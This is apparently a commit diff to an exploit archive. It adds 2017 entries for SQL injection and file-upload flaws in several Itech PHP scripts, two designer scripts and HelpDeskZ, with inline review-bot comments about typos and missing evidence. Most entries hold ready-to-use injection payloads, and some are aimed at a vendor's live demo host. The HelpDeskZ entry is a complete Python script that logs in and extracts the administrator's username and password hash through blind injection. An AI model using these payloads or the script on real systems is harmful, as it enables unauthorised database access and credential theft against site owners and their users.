Caregiver Script 2.51 is the best solution to launch a portal for hiring people for babysitting and other care giving services in a hassle free manner.
Type of vulnerability:
An SQL Injection vulnerability in Caregiver Script allows attackers to read
arbitrary administrator data from the database.
Vulnerable Url:
http://locahost/searchJob.php?sitterService=1[payload]
Vulnerable parameter : sitterService
Mehod : GET
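Review bot: the version is inconsistent: the title says Caregiver Script v2.57 but the Overview describes 2.51, so it is unclear which build the finding applies to. The entry also asserts that attackers can read arbitrary administrator data yet supplies nothing beyond `sitterService=1[payload]`, with no injection type or confirming response, unlike the sibling itechscripts entries in this commit; add the same kind of evidence so the claim can be verified. Typos: `locahost` in the URL, `Mehod` for Method.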

platforms/php/webapps/41187.txt Executable file
@ -0,0 +1,30 @@
Exploit Title: Itech Auction Script v6.49 SQL Injection
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/auction-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Auction Script v6.49 is the best standard auction product. This also comes pre-integrated with a robust Multi-Vendor interface and a powerful CMS panel.
Type of vulnerability:
An SQL Injection vulnerability in Itech Auction Script allows attackers to read
arbitrary data from the database.
Vulnerability:
URL : http://locahost/mcategory.php?mcid=4[payload]
Parameter: mcid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: mcid=4' AND 1734=1734 AND 'Ggks'='Ggks
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: mcid=-5980' UNION ALL SELECT CONCAT(0x71706b7171,0x764646494f4c7178786f706c4b4749517349686768525865666c6b6456434c766b73755a44657777,0x7171706a71)-- XAee
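Review bot: `locahost` in the vulnerable URL line is a typo for `localhost`, the same slip as in the Caregiver Script entry of this commit; fix it before the entry becomes a searchable record.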

platforms/php/webapps/41188.txt Executable file
@ -0,0 +1,34 @@
Exploit Title: Itech B2B Script v4.28 SQL Injection
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/b2b-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
B2B Script v4.28 is a versatile web solution for the webmasters who are willing to launch their own B2B Portal within a few minutes.
Type of vulnerability:
An SQL Injection vulnerability in Itech B2B Script v4.28 allows attackers to read
arbitrary data from the database.
Vulnerability:
URL : catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7[payload]
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://localhost/catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7' AND 6539=6539 AND 'Fakj'='Fakj
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: http://localhost/catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7' OR SLEEP(5) AND 'aEyV'='aEyV
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: http://localhost/catcompany.php?token=-4421' UNION ALL SELECT NULL,CONCAT(0x71627a7071,0x596a5174756f74736847615667486444426f697a5549434943697a697064466865494a7156794770,0x716b707a71),NULL,NULL,NULL,NULL-- JwUA ---
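Review bot: the vulnerable URL is given as a bare path (`catcompany.php?token=...[payload]`) while all three payload lines carry a full `http://localhost/` prefix; use one form, as the other entries do. `Parameter: #1* (URI)` names no parameter at all, and since every payload replaces the `token` value the entry should say so in plain words. The trailing `---` after the UNION payload is a leftover separator and should be removed.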

platforms/php/webapps/41189.txt Executable file
@ -0,0 +1,30 @@
Exploit Title: Itech Classifieds Script v7.27 SQL Injection
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/classifieds-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Classifieds Script v7.27 is the best classifieds software. Try this script and present yourself with a robust digital platform.
Type of vulnerability:
An SQL Injection vulnerability in Classifieds Script v7.27 allows attackers to read
arbitrary data from the database.
Vulnerability:
URL : http://localhost/subpage.php?scat=51[payload]
Parameter: scat (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: scat=51' AND 4941=4941 AND 'hoCP'='hoCP
Type: UNION query
Title: Generic UNION query (NULL) - 26 columns
Payload: scat=51' UNION ALL SELECT CONCAT(0x7162787871,0x6d4d4d63544378716c72467441784342664b4a6f424d615951594f476c53465070635545505a7558,0x716b767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- SKES

platforms/php/webapps/41190.txt Executable file
@ -0,0 +1,26 @@
Exploit Title: Itech Dating Script v3.26 SQL Injection
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/dating-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Itech Dating Script v3.26 is a powerful platform to launch a dating portal. This product is extremely popular among the new webmasters.
Type of vulnerability:
An SQL Injection vulnerability in Itech Dating Script v3.26 allows attackers to read
arbitrary data from the database.
Vulnerability:
URL : http://localhost/see_more_details.php?id=40[payload]
Parameter: id (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 29 columns
Payload: id=40 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a7a6a71,0x61777373447a7141494372496e6c63596f6f62586e534e544b53656b7077534e704e755266517347,0x716a626271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- nZhVs

platforms/php/webapps/41191.txt Executable file
@ -0,0 +1,26 @@
Exploit Title: Itech Freelancer Script v5.13 SQL Injection
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/freelancer-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Itech Freelancer Script v5.13 is the best reverse auction script available online. Just install the product to launch your website within minutes. Please try the product now.
Type of vulnerability:
An SQL Injection vulnerability in Itech Freelancer Script v5.13 allows attackers to read
arbitrary data from the database.
Vulnerability:
URL : http://localhost/category.php?sk=4[payload]
Parameter: sk (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 52 columns
Payload: sk=1') UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7162787871,0x4c4d424a4d6549554b5878684e494a4464767161454a6d757a47454c697a4e4470544c46426e4765,0x71716b7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- rbbL
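Review bot: the URL template shows `category.php?sk=4[payload]` but the recorded payload is `sk=1') UNION ALL SELECT ...`, which closes a quote and a parenthesis the template gives no hint of and uses a different base value; either show the quoting context in the template or note that the payload was captured from a different request, otherwise the two lines cannot be reconciled by a reader verifying the finding.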

platforms/php/webapps/41193.txt Executable file
@ -0,0 +1,35 @@
Exploit Title: Itech Multi Vendor Script 6.49 SQL Injection
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/multi-vendor-shopping-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Multi Vendor Script v6.49 offers a robust eCommerce platform. The script has been designed to deliver all major features required to run an eCommerce website.
Type of vulnerability:
An SQL Injection vulnerability in Itech Multi Vendor Script 6.49 allows attackers to read
arbitrary data from the database.
Vulnerability:
http://localhost/multi-vendor-shopping-script/product-list.php?pl=[payload]
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://localhost/multi-vendor-shopping-script/product-list.php?pl=11201ff1de774005f8da13f42943881c655f' RLIKE (SELECT (CASE WHEN (6851=6851) THEN 0x313132303166663164653737343030356638646131336634323934333838316336353566 ELSE 0x28 END))-- HnQm
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: http://localhost/multi-vendor-shopping-script/product-list.php?pl=11201ff1de774005f8da13f42943881c655f' AND SLEEP(5)-- WHze
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: http://localhost/multi-vendor-shopping-script/product-list.php?pl=-3569' UNION ALL SELECT CONCAT(0x716b6a7871,0x7573485a716b767347544870695571415a465846434b5541777566416a6571656d6a5a6c62526f47,0x7170627171),NULL,NULL,NULL,NULL#
---
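Review bot: the URL template `product-list.php?pl=[payload]` drops the value that every payload actually injects after (`pl=11201ff1de774005f8da13f42943881c655f'`), so it should read `pl=11201ff1de774005f8da13f42943881c655f[payload]` to follow the convention of the other entries; as in the B2B Script entry, `Parameter: #1* (URI)` should be replaced by the parameter name `pl`. The lone `---` at the end of the file is a stray separator.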

platforms/php/webapps/41194.txt Executable file
@ -0,0 +1,34 @@
Exploit Title: Itech News Portal Script v6.28 SQL Injection
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/news-portal-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
News Portal Script v6.28 is a CMS Software developed as a news broadcasting portal. This product is considered as the best in this category.
Type of vulnerability:
An SQL Injection vulnerability in News Portal Script v6.28 allows attackers to read
arbitrary data from the database.
Vulnerability:
http://localhost/news-portal-script/information.php?inf=22[payload]
Parameter: inf (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: inf=22 AND 3993=3993
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: inf=22 OR SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: inf=-1695 UNION ALL SELECT CONCAT(0x716a787171,0x7356527144546c6e6b47714b49415759595952764c734a657165476f4d496e534e565668666f786f,0x7178787671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- trhS

platforms/php/webapps/41195.txt Executable file
@ -0,0 +1,34 @@
Exploit Title: Itech Real Estate Script v3.12 SQL Injection
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/real-estate-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Itech Real Estate Script v3.12 is a robust platform for launching real-estate portals. This script is currently available under a special pricing of US$199.
Type of vulnerability:
An SQL Injection vulnerability in Itech Real Estate Script v3.12 allows attackers to read
arbitrary data from the database.
Vulnerability:
http://localhost/real-estate-script/search_property.php?property_for=1[payload]
Parameter: property_for (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: property_for=1 AND 4574=4574
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: property_for=1 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: property_for=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176707a71,0x65546e587a4d65446c625876704b7a784d6651575074684f516f43486d716f5844664870577a6d43,0x7178626b71)-- zLWo

platforms/php/webapps/41197.txt Executable file
@ -0,0 +1,35 @@
# # # # #
# Exploit Title: PHP Product Designer Script - Arbitrary File Upload
# Google Dork: N/A
# Date: 30.01.2017
# Vendor Homepage: https://codecanyon.net/item/php-product-designer/19334412
# Software Buy: https://codecanyon.net/item/php-product-designer/19334412
# Demo: http://phpproductdesigner.000webhostapp.com/products.php
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# http://localhost/[PATH]/products.php / Create New Design
# http://localhost/[PATH]/theme/images/uploads/[......PHP]
# # # # #
# uploadImage.php
<?php
$output_dir = "./theme/images/uploads/";
.
.
.
$imagetemp = explode(".", $_FILES["imagefile"]["name"]);
$newimagename = round(microtime(true)) . '.' . end($imagetemp);
//move the uploaded file to uploads folder;
move_uploaded_file($_FILES["imagefile"]["tmp_name"],$output_dir. $newimagename);
echo $output_dir . $newimagename;
}
}
?>
# # # # #
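Review bot: the quoted uploadImage.php shows the defect (the stored extension is whatever follows the last `.` of the client-supplied filename, and the only other processing is a timestamp for the base name) but the entry offers no remediation; add a Fix section recommending an extension allow-list, a server-side content check instead of trusting the filename, and disabling PHP execution under theme/images/uploads/. The elided fragment also ends with two closing braces whose opening `if` blocks were cut; mark the cut with a comment or include the enclosing blocks so the snippet is self-consistent.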

platforms/php/webapps/41198.txt Executable file
@ -0,0 +1,35 @@
# # # # #
# Exploit Title: PHP Logo Designer Script - Arbitrary File Upload
# Google Dork: N/A
# Date: 30.01.2017
# Vendor Homepage: https://codecanyon.net/item/php-logo-designer/19362231
# Software Buy: https://codecanyon.net/item/php-logo-designer/19362231
# Demo: http://phplogodesigner.000webhostapp.com/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# http://localhost/[PATH]/designer.php
# http://localhost/[PATH]/theme/images/uploads/[......PHP]
# # # # #
# uploadImage.php
<?php
$output_dir = "./theme/images/uploads/";
.
.
.
$imagetemp = explode(".", $_FILES["imagefile"]["name"]);
$newimagename = round(microtime(true)) . '.' . end($imagetemp);
//move the uploaded file to uploads folder;
move_uploaded_file($_FILES["imagefile"]["tmp_name"],$output_dir. $newimagename);
echo $output_dir . $newimagename;
}
}
?>
# # # # #
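Review bot: the uploadImage.php fragment here is identical to the one quoted in the PHP Product Designer entry of this same commit (same `$output_dir`, same `end(explode(".", ...))` extension handling, same `round(microtime(true))` name), so the two entries should cross-reference each other and carry the same remediation advice (extension allow-list, server-side content check, no script execution in the uploads directory); the two unmatched closing braces at the end should likewise be marked as an elision.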

platforms/php/webapps/41199.txt Executable file
@ -0,0 +1,38 @@
Exploit Title: Video Sharing Script 4.94 SQL Injection
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/video-sharing-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Video Sharing Script v4.94 is the best audio/ video sharing portal. You can easily deploy the software and launch your own video sharing portal in moments.
Type of vulnerability:
An SQL Injection vulnerability in Video Sharing Script 4.94 allows attackers to read
arbitrary data from the database.
Vulnerability:
http://localhost/video-sharing-script/watch-video.php?v=67d8ab[payload]
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://video-sharing.itechscripts.com:80/watch-video.php?v=67d8ab' RLIKE (SELECT (CASE WHEN (1170=1170) THEN 0x363764386162 ELSE 0x28 END))-- Niby
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: http://video-sharing.itechscripts.com:80/watch-video.php?v=67d8ab' AND (SELECT 2680 FROM(SELECT COUNT(*),CONCAT(0x7176627171,(SELECT (ELT(2680=2680,1))),0x71786b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Wovm
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: http://video-sharing.itechscripts.com:80/watch-video.php?v=67d8ab' AND SLEEP(5)-- pcjq
Type: UNION query
Title: MySQL UNION query (NULL) - 26 columns
Payload: http://video-sharing.itechscripts.com:80/watch-video.php?v=-8184' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627171,0x757277777751656e7948736349597976767448516b784656504a646a72475952546b6d554251736c,0x71786b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
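Review bot: the vulnerable URL is given against `http://localhost/video-sharing-script/` but every payload line is recorded against `http://video-sharing.itechscripts.com:80/`, the vendor's live demo host; rewrite the payload lines to the localhost form used by the rest of these entries so the record does not point readers at a third-party production system. `Parameter: #1* (URI)` should also name the parameter, which from the payloads is `v`.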

platforms/php/webapps/41200.py Executable file
@ -0,0 +1,172 @@
'''
# Exploit Title: HelpDeskZ <= v1.0.2 - Authenticated SQL Injection / Unauthorized file download
# Google Dork: intext:"Help Desk Software by HelpDeskZ", inurl:?v=submit_ticket
# Date: 2017-01-30
# Exploit Author: Mariusz Popławski, kontakt@deepsec.pl ( www.afine.pl )
# Vendor Homepage: http://www.helpdeskz.com/
# Software Link: https://github.com/evolutionscript/HelpDeskZ-1.0/archive/master.zip
# Version: <= v1.0.2
# Tested on:
# CVE :
HelpDeskZ <= v1.0.2 suffers from an sql injection vulnerability that allow to retrieve administrator access data, and download unauthorized attachments.
Software after ticket submit allow to download attachment by entering following link:
http://127.0.0.1/helpdeskz/?/?v=view_tickets&action=ticket&param[]=2(VALID_TICKET_ID_HERE)&param[]=attachment&param[]=1&param[]=1(ATTACHMENT_ID_HERE)
FILE: view_tickets_controller.php
LINE 95: $attachment = $db->fetchRow("SELECT *, COUNT(id) AS total FROM ".TABLE_PREFIX."attachments WHERE id=".$db->real_escape_string($params[2])." AND ticket_id=".$params[0]." AND msg_id=".$params[3]);
third argument AND msg_id=".$params[3]; sent to fetchRow query with out any senitization
Steps to reproduce:
http://127.0.0.1/helpdeskz/?/?v=view_tickets&action=ticket&param[]=2(VALID_TICKET_ID_HERE)&param[]=attachment&param[]=1&param[]=1 or id>0 -- -
by entering a valid id of param[] which is our submited ticket id and adding our query on the end of request we are able to download any uploaded attachment.
Call this script with the base url of your HelpdeskZ-Installation and put your submited ticket login data (EMAIL, PASSWORD)
steps:
1. go to http://192.168.100.115/helpdesk/?v=submit_ticket
2. Submit a ticket with valid email (important we need password access).
3. Add attachment to our ticket (important step as the attachment table may be empty, we need at least 1 attachment in db to valid our query).
4. Get the password from email.
4. run script
root@kali:~/Desktop# python test.py http://192.168.100.115/helpdesk/ localhost@localhost.com password123
where http://192.168.100.115/helpdesk/ = base url to helpdesk
localhost@localhost.com = email which we use to submit the ticket
password123 = password that system sent to our email
Output of script:
root@kali:~/Desktop# python test.py http://192.168.100.115/helpdesk localhost@localhost.com password123
2017-01-30T09:50:16.426076 GET http://192.168.100.115/helpdesk
2017-01-30T09:50:16.429116 GET http://192.168.100.115/helpdesk/
2017-01-30T09:50:16.550654 POST http://192.168.100.115/helpdesk/?v=login
2017-01-30T09:50:16.575227 GET http://192.168.100.115/helpdesk/?v=view_tickets
2017-01-30T09:50:16.674929 GET http://192.168.100.115/helpdesk?v=view_tickets&action=ticket&param[]=6&param[]=attachment&param[]=1&param[]=1%20or%201=1%20and%20ascii(substr((SeLeCt%20table_name%20from%20information_schema.columns%20where%20table_name%20like%20'%staff'%20%20limit%200,1),1,1))%20=%20%2047%20--%20-
...
------------------------------------------
username: admin
password: sha256(53874ea55571329c04b6998d9c7772c9274d3781)
'''
import requests
import sys
if( len(sys.argv) < 3):
print "put proper data like in example, remember to open a ticket before.... "
print "python helpdesk.py http://192.168.43.162/helpdesk/ myemailtologin@gmail.com password123"
exit()
EMAIL = sys.argv[2]
PASSWORD = sys.argv[3]
URL = sys.argv[1]
def get_token(content):
token = content
if "csrfhash" not in token:
return "error"
token = token[token.find('csrfhash" value="'):len(token)]
if '" />' in token:
token = token[token.find('value="')+7:token.find('" />')]
else:
token = token[token.find('value="')+7:token.find('"/>')]
return token
def get_ticket_id(content):
ticketid = content
if "param[]=" not in ticketid:
return "error"
ticketid = ticketid[ticketid.find('param[]='):len(ticketid)]
ticketid = ticketid[8:ticketid.find('"')]
return ticketid
def main():
# Start a session so we can have persistant cookies
session = requests.session(config={'verbose': sys.stderr})
r = session.get(URL+"")
#GET THE TOKEN TO LOGIN
TOKEN = get_token(r.content)
if(TOKEN=="error"):
print "cannot find token"
exit();
#Data for login
login_data = {
'do': 'login',
'csrfhash': TOKEN,
'email': EMAIL,
'password': PASSWORD,
'btn': 'Login'
}
# Authenticate
r = session.post(URL+"/?v=login", data=login_data)
#GET ticketid
ticket_id = get_ticket_id(r.content)
if(ticket_id=="error"):
print "ticketid not found, open a ticket first"
exit()
target = URL +"?v=view_tickets&action=ticket&param[]="+ticket_id+"&param[]=attachment&param[]=1&param[]=1"
limit = 1
char = 47
prefix=[]
while(char!=123):
target_prefix = target+ " or 1=1 and ascii(substr((SeLeCt table_name from information_schema.columns where table_name like '%staff' limit 0,1),"+str(limit)+",1)) = "+str(char)+" -- -"
response = session.get(target_prefix).content
if "couldn't find" not in response:
prefix.append(char)
limit=limit+1
char=47
else:
char=char+1
table_prefix = ''.join(chr(i) for i in prefix)
table_prefix = table_prefix[0:table_prefix.find('staff')]
limit = 1
char = 47
admin_u=[]
while(char!=123):
target_username = target+ " or 1=1 and ascii(substr((SeLeCt username from "+table_prefix+"staff limit 0,1),"+str(limit)+",1)) = "+str(char)+" -- -"
response = session.get(target_username).content
if "couldn't find" not in response:
admin_u.append(char)
limit=limit+1
char=47
else:
char=char+1
limit = 1
char = 47
admin_pw=[]
while(char!=123):
target_password = target+ " or 1=1 and ascii(substr((SeLeCt password from "+table_prefix+"staff limit 0,1),"+str(limit)+",1)) = "+str(char)+" -- -"
response = session.get(target_password).content
if "couldn't find" not in response:
admin_pw.append(char)
limit=limit+1
char=47
else:
char=char+1
admin_username = ''.join(chr(i) for i in admin_u)
admin_password = ''.join(chr(i) for i in admin_pw)
print "------------------------------------------"
print "username: "+admin_username
print "password: sha256("+admin_password+")"
if admin_username=="" and admin_password=='':
print "Your ticket have to include attachment, probably none atachments found, or prefix is not equal hdz_"
print "try to submit ticket with attachment"
if __name__ == '__main__':
main()
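Review bot: the argument check is off by one: `len(sys.argv) < 3` lets a two-argument call through and `sys.argv[3]` then raises IndexError instead of printing the usage text, so it should be `< 4`. `requests.session(config={...})` fails on every requests release since 1.0, where the `config` keyword was removed, and the `print` statements are Python 2 only; fill in the empty `Tested on:` header with the interpreter and requests versions used, or update the calls. On the description: the quoted fetchRow line escapes only `$params[2]`, while `$params[0]` (ticket_id) and `$params[3]` (msg_id) are both concatenated raw, so a fix that sanitises only the "third argument" the text names would be incomplete; the advisory should say all three need parameterising. The `sha256(...)` label in the output is hard-coded, and the sample value shown in the header is 40 hex digits, which is not a SHA-256 length, so the script should not assert the algorithm. The `CVE :` field is left blank.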

platforms/php/webapps/41201.txt Executable file
@ -0,0 +1,20 @@
# # # # #
# Exploit Title: Itech Classifieds Script v7.27 - 'pid' Parameter SQL Injection
# Google Dork: N/A
# Date: 30.01.2017
# Vendor Homepage: http://itechscripts.com/
# Software Buy: http://itechscripts.com/classifieds-script/
# Demo: http://itechscripts.com/classifieds-script/
# Version: 7.27
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/message.php?pid=[SQL]
# E.t.c
# # # # #
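Review bot: the entry carries no evidence beyond `message.php?pid=[SQL]` and `E.t.c`; at minimum record the injection type observed and the response that confirmed it, as the other Itech Classifieds Script v7.27 entry in this commit (the `scat` parameter of subpage.php) does, and cross-reference that entry since both concern the same product and version.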

platforms/php/webapps/41202.txt Executable file
@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Itech Dating Script v3.26 - 'send_gift.php' SQL Injection
# Google Dork: N/A
# Date: 30.01.2017
# Vendor Homepage: http://itechscripts.com/
# Software Buy: http://itechscripts.com/dating-script/
# Demo: http://dating.itechscripts.com/
# Version: 3.26
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/send_gift.php?id=[SQL]
# E.t.c
# # # # #
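Review bot: the step `Login as regular user` means this is an authenticated injection, but the title does not say so; retitle to make the precondition clear. As with the other `[SQL]`/`E.t.c` entries in this commit, supply the observed injection type and the confirming response rather than a placeholder, and cross-reference the `see_more_details.php` finding against the same Itech Dating Script v3.26.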

platforms/php/webapps/41203.txt Executable file
@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Itech Real Estate Script v3.12 - 'id' Parameter SQL Injection
# Google Dork: N/A
# Date: 30.01.2017
# Vendor Homepage: http://itechscripts.com/
# Software Buy: http://itechscripts.com/real-estate-script/
# Demo: http://real-estate.itechscripts.com
# Version: 3.12
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/agent_search_property.php?id=[SQL]
# E.t.c
# # # # #
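Review bot: same gap as the other `[SQL]` placeholder entries in this commit: `agent_search_property.php?id=[SQL]` plus `E.t.c` is not reproducible evidence; record the injection type and the confirming response, and cross-reference the `property_for` finding in search_property.php against the same Itech Real Estate Script v3.12.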

@ -13,7 +13,7 @@
<title>0day</title>
<center>
<font size=7>PHP 5.4.3 0day by 0in & cOndis</font><br>
<textarea rows=50 cols=50 id="log">&lt;/textarea&gt;
<textarea rows=50 cols=50 id="log"></textarea>
</center>
<script>
function sleep(milliseconds) {